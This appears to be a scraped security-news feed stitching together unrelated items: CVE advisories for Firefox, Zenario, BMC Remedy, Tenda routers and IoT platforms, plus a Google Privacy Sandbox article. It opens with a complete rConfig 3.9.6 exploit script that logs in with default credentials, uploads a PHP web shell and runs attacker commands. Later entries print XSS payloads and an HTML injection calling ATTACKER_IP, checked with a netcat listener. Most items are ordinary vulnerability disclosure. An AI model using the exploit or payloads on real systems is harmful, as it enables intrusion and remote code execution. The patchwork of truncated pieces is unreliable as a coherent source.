An arbitrary file upload vulnerability in rconfig v3.9.6 allows attackers to execute arbitrary code via a crafted PHP file.

**rconfig 3.9.6 - Arbitrary File Upload**

**Platform:****PHP**

**Date:****2021-04-21**

  

    # Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
    # Exploit Author: Vishwaraj Bhattrai
    # Date: 18/04/2021
    # Vendor Homepage: https://www.rconfig.com/
    # Software Link: https://www.rconfig.com/
    # Vendor: rConfig
    # Version: <= v3.9.6
    # Tested against Server Host: Linux+XAMPP
    
    import requests
    import sys
    s = requests.Session()
    
    host=sys.argv[1] #Enter the hostname
    cmd=sys.argv[2]  #Enter the command
    
    def exec_cmd(cmd,host):
        print "[+]Executing command"
        path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
        response=requests.get(path)
        print response.text
        print "\n[+]You can access shell via below path"
        print path
    
    def file_upload(cmd,host):
        print "[+]Bypassing file upload"
        burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
        burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
        burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
        requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
        exec_cmd(cmd,host)
    
    
    def login(host,cmd):
        print "[+]Logging in"
        burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
        
        burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
        response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
        file_upload(cmd,host)
    
    login(host,cmd)

CVE-2022-44384: Offensive Security’s Exploit Database Archive

Debian Linux Security Advisory 5282-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, information disclosure, spoofing or bypass of the SameSite cookie policy.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5282-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2022-45403 CVE-2022-45404 CVE-2022-45405 CVE-2022-45406                 CVE-2022-45408 CVE-2022-45409 CVE-2022-45410 CVE-2022-45411                 CVE-2022-45412 CVE-2022-45416 CVE-2022-45418 CVE-2022-45420                 CVE-2022-45421Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, information disclosure, spoofing or bypass of the SameSite cookiepolicy.For the stable distribution (bullseye), these problems have been fixed inversion 102.5.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmN1MS0ACgkQEMKTtsN8TjbLmBAAvNyETXc0dcwyCQIi/l6KVCLVwzQ8na8zSbrZZGzhebA7WKqeryy8O4f/8qv/chi7chHIlSY9aHkw65fDklAIkKomXUi+E58yvuSa1/DyYBGpQMoWrzHE4hAqs+VuZ/FwY/QiNeOXo0q44PuT/cjBY9LEUciJSywEK/YI0fPDG+F1VbaCK0EOvw7Zxi+VxVCkN6UIF7g0Rr3eibTWKgZi/EHrMgtA4UYg5ml6INVo306azZlDtTfZHympU48OKweMBEWpk0/f6rHmpTuWPWsuzLlpECeBRj4OdJOjmnjprhKJxE4KhHCJkYfVOLBh0SPjIM8k6bgzgXhD3Lc62xE2mqfDHYkIhMtm60r9GZbJzlEht8qeYLtlibfpm+IGx/RJDeuQJTv5jzsXto/lY4zThl/++E/30ecH7ynqj1R3394BAd9rW2O2rWcrWyas8Wa5Qpt7R+/OULq0OEAflT9m4HY3unflxIvmyTSINjryyKFe5Ns4uWB3E5sDBcnV4hqY/NOkUBVaZEhqmL9bvMvtviwj0eDzJBqVgOUxcy+IiT6aCCC4Dnr/CH3Odv7KHHpexKIIT80/uPNZPv2d5nNZXW5JO4ycD7lrZktjCOmXBHkJ2UJiQ3EiGJF6POIOInrEikwV7DqY1ix4uKbvl42xrsa7rZUYHWylFOS9gnFcJOk=5Vwd-----END PGP SIGNATURE-----

Debian Security Advisory 5282-1

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via svg,Users & Contacts.

**Summary**  
hi team,  
I found Stored XSS in upload file svg version 9.0.54156 reported the vulnerability with CVE-2021-41952, in version 9.3.57186 i have bypassed it  
visit : #1 to view my report

**Info**  
Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  
Chrome 106.0.5249.119

_**I will recreate it again**_  
**Steps**

1.  Login home page >> Choose **Users & Contacts** and create any user
    
2.  Click **Image** >> Upload an image  
    
3.  payload i inject to svg  
    
4.  go to link file inject , paypload executed

CVE-2022-44073: XSS upload file SVG in Zenario 9.3.57186 · Issue #6 · hieuminhnv/Zenario-CMS-last-version

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via News articles.

**Summary**  
hi team,  
I found small Stored XSS

**Info**

Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  

**Steps**

Login to account http://xxx.xxx.x.x/admin.php?  

in tab Menu, choose **News articles**  
Click **New News articles** >> in tab **Meta Data** inject code into **Summary** and tab **Main content** >> save  
  
  

**payload:** <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" \`AllowScriptAccess="always">

CVE-2022-44070: Stored XSS in News articles · Issue #3 · hieuminhnv/Zenario-CMS-last-version

Ubuntu Security Notice 5726-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of the addressbar, bypass security restrictions, cross-site tracing or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5726-1November 16, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of theaddressbar, bypass security restrictions, cross-site tracing or executearbitrary code. (CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409, CVE-2022-45410,CVE-2022-45411, CVE-2022-45413, CVE-2022-40674, CVE-2022-45418, CVE-2022-45419,CVE-2022-45420, CVE-2022-45421)Armin Ebert discovered that Firefox did not properly manage while resolvingfile symlink. If a user were tricked into opening a specially crafted weblink,an attacker could potentially exploit these to cause a denial of service. (CVE-2022-45412)Jefferson Scher and Jayateertha Guruprasad discovered that Firefox did notproperly sanitize the HTML download file extension under certain circumstances.If a user were tricked into downloading and executing malicious content, aremote attacker could execute arbitrary code with the privileges of the userinvoking the programs. (CVE-2022-45415)Erik Kraft, Martin Schwarzl, and Andrew McCreight discovered that Firefoxincorrectly handled keyboard events. An attacker could possibly use thisissue to perform a timing side-channel attack and possibly figure out whichkeys are being pressed. (CVE-2022-45416)Kagami discovered that Firefox did not detect Private Browsing Mode correctly.An attacker could possibly use this issue to obtain sensitive information aboutPrivate Browsing Mode.(CVE-2022-45417)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         107.0+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         107.0+build2-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-5726-1  CVE-2022-40674, CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,  CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409,  CVE-2022-45410, CVE-2022-45411, CVE-2022-45412, CVE-2022-45413,  CVE-2022-45415, CVE-2022-45416, CVE-2022-45417, CVE-2022-45418,  CVE-2022-45419, CVE-2022-45420, CVE-2022-45421Package Information:  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5726-1

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.
To that end, developers will need to complete an enrollment process in order

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.

"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.

To that end, developers will need to complete an enrollment process in order to utilize the ads-related APIs, including Topics, FLEDGE, and Attribution Reporting.

Topics, which replaced Federated Learning of Cohorts (FLoC) earlier this year, aims to categorize user interests under different "topics" based on their device web browsing history. These inferred interests are then shared with marketers to serve targeted ads.

FLEDGE and Attribution reporting, on the other hand, enable custom audience targeting and help measure ad conversions without relying on cross-party user identifiers, respectively.

Organizations can also request access for a limited number of devices to test the Beta, plus register any apps which will utilize the Privacy Sandbox APIs.

The development comes after the search and advertising giant expanded the initiative to include its mobile operating system in February 2022, and followed it up with a developer preview in May 2022.

Privacy Sandbox is an effort led by Google to create a set of web standards for websites to access user information without compromising on privacy. It aims to facilitate online advertising without resorting to invasive methods like third-party tracking cookies or fingerprinting.

That said, the company's plans to turn off third-party cookies in the Chrome web browser have been delayed twice, with the technology now expected to be phased out sometime in the second half of 2024.

To complicate matters further, the proposals have drawn criticism from rival browser vendors like Mozilla Firefox and developers of other Chromium-based browsers such as Brave, Opera, and Vivaldi, who have said the newer methods would cement "Google's position as a web monopolist."

DuckDuckGo, which blocks Privacy Sandbox through its Chrome browser extension as of May 2022, said Topics allows Google to surveil users' online activities and share that information with advertisers for behavioral targeting without their consent.

"This targeting, regardless of how it's done, enables manipulation (ex. exploiting personal vulnerabilities), discrimination (ex. people not seeing job opportunities based on personal profiles), and filter bubbles (ex. creating echo chambers that can divide people) that many people would like to avoid," the company noted.

Despite the pushback, Google said it's looking to engage with the broader ecosystem and gather "continued feedback as we enter this next phase of testing."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google to Roll Out Privacy Sandbox Beta on Android 13 by Early 2023

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20221110-0 >  
=======================================================================  
               title: HTML Injection  
             product: BMC Remedy ITSM-Suite  
  vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)  
       fixed version: 22.1  
          CVE number: CVE-2022-26088  
              impact: Low  
            homepage: https://www.bmc.com/it-solutions/remedy-itsm.html  
               found: 2021-08-11  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix  
ITSM service provide out of-the-box IT Information Library (ITIL)  
service support functionality. Remedy ITSM Suite and BMC Helix ITSM  
service streamline and automate the processes around IT service desk,  
asset management, and change management operations. It also enables  
you to link your business services to your IT infrastructure to help  
you manage the impact of technology changes on business and business  
changes on technology — in real time and into the future. In addition,  
you can understand and optimize the user experience, balance current  
and future infrastructure investments, and view potential impact on  
the business by using a real-time service model."

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.

The vendor states that:  
 > We have done hardening in version 22.1.  
 > However, we do not agree with assigning the CVE to this vulnerability.  
 > As mentioned previously this is an informative vulnerability, and no real  
   impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or  
exfiltrate information.

Vulnerability overview/description:  
-----------------------------------  
1) HTML Injection (CVE-2022-26088)  
An authenticated attacker who can forward incidents per email is able to inject  
a limited set of HTML tags. This is accomplished by inserting arbitrary content  
into the "To:" field of the email. There is a filtering mechanism that prevents  
the injection of many HTML tags, for example <script>, and it also removes event  
handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the  
incident which states that $USER has sent an email to <X> recipients. Upon  
clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force  
the user's browser to make requests to his specified URL. This can be used to  
trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept:  
-----------------  
1) HTML Injection (CVE-2022-26088)  
When an incident is viewed, there is a button which allows forwarding the  
incident by mail. After entering a TO address and the body of the email, it can  
be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing  
the 'Email.To.InternetEmail' parameter. The modified request is:

-------------------------------------------------------------------------------  
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1  
Host: TARGET  
Cookie: […]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json;charset=utf-8  
X-Xsrf-Token: SOME_TOKEN  
Content-Length: ADAPT_AS_NEEDED  
Te: trailers  
Connection: close

{  
   "worknote": "pentest",  
   "access": true,  
   "Email.From.Person": {  
     "email": "SOME_SENDING_MAIL",  
     "fullName": "Pentest - SEC Consult",  
     "loginId": "USERNAME"  
   },  
   "Email.Subject": "SOME_SUBJECT",  
   "Email.Body": "test2",  
   "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",  
   "workInfoType": 16000  
}  
-------------------------------------------------------------------------------

The parameter Email.To.InternetEmail contains the payload. In this case an  
image tag containing the IP of the attacker was inserted:  
"<img src=http://LOCAL_IP:8001/>a@example.test"  
The a@example.test is needed to pass the email validation step and example.test  
was used to prevent sending out real emails.

After this step, the information that $USER has sent an email to 1 recipient  
will be appended in the activity log of this incident.

Now we start a local netcat listener with the command  
$ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser  
issues a request to our 'netcat' instance.

This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 9.1.10 this corresponds to version 20.02 as stated at the following URL:  
https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline:  
------------------------  
2021-09-07: Contacting vendor through email (appsec@bmc.com).  
2021-09-28: Vendor states that they did not get the first email.  
2021-09-29: Resending the advisory to their renewed GPG key.  
2021-10-29: Fix pending, request to delay publication.  
2021-11-18: Vulnerability is fixed and the fix is being evaluated.  
2022-01-17: Asking for a status update.  
2022-01-17: Vulnerability is fixed, no scheduled release.  
2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.  
2022-02-24: Fixed in Smart-IT 22.1, release postponed.  
2022-03-30: Release postponed to May 2022.  
2022-04-20: Asking if the fixed version will be released in May.  
2022-05-17: Asking if the fixed version will be released in May.  
2022-05-23: Release rescheduled to end of June/July  
2022-08-04: Asking for status  
2022-08-05: Product was released  
2022-08-31: Asking for link to update  
2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again  
2022-09-06: Vendor asks for final version of advisory  
2022-09-06: Asking vendor for a new GPG key because of expiry  
2022-09-07: Sending the final advisory to the vendor  
2022-09-12: Vendor will check the advisory and answer in 1 or 2 days  
2022-09-14: Vendor states that their application is not vulnerable to CSRF and  
             asks if other data could be leaked via the HTTP request  
2022-09-15: We clarify that their application does not seem to be vulnerable to  
             CSRF but the HTML injection allows CSRFing other applications in the intranet.  
             Also we did not have time to assess if other data besides User-Agent and the  
             client's IP can be leaked.  
2022-10-04: We request an update to the previous mail.  
2022-10-19: Vendor sticks to their own original impact analysis.  
2022-11-10: Public release of security advisory.

Solution:  
---------  
Upgrade to version 22.1 or later which can be downloaded at the vendor's page:  
https://www.bmc.com/support/resources/product-downloads.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2022

BMC Remedy ITSM-Suite 9.1.10 / 20.02 HTML Injection

Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setWanPpoe function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.

CVE-2022-42060: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), there exists a command injection vulnerability in the function formSetFixTools. This vulnerability allows attackers to run arbitrary commands on the server via the hostname parameter.

CVE-2022-40847: Vulnerabilities in Tenda's W15Ev2 AC1200 Router

Konker v2.3.9 was to discovered to contain a Cross-Site Request Forgery (CSRF).

**CVE-ID: CVE-2022-35613**

**Popular posts from this blog**

**CVE-ID: CVE-2022-35137**

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies. References: https://owasp.org/www-community/attacks/xss/

**CVE-ID: CVE-2022-35135, CVE-2022-35136**

CVE-2022-35136:  Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests. CVE-2022-35135:  Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges  via a crafted request sent to /api/user/upsert/<uuid>.  The platform successfully processes API requests even without valid cookies.For example, the following request to update user profile is processed, even though the request does not have any cookie/api key. (Cookie header is blank in the request) Since API requests to the platform are not authenticated, a user can assign themselves an admin role, by sending a request to  http://192.168.72.157/api/user/upsert/<userid>  endpoint. HTTP Request: POST /api/user/upsert/8c34fa03- 706a-4dc7-b484-cd8e0c329c81 HTTP/1.1 Host: 192.168.72.157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Re

**CVE-ID: CVE-2022-31861**

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs. Patch details:  https://github.com/thingsboard/thingsboard/pull/7385 Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform. According to Thingsboard's documentation ( https://thingsboard.io/docs/pe/user-guide/rbac/ ), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as

Tag

#firefox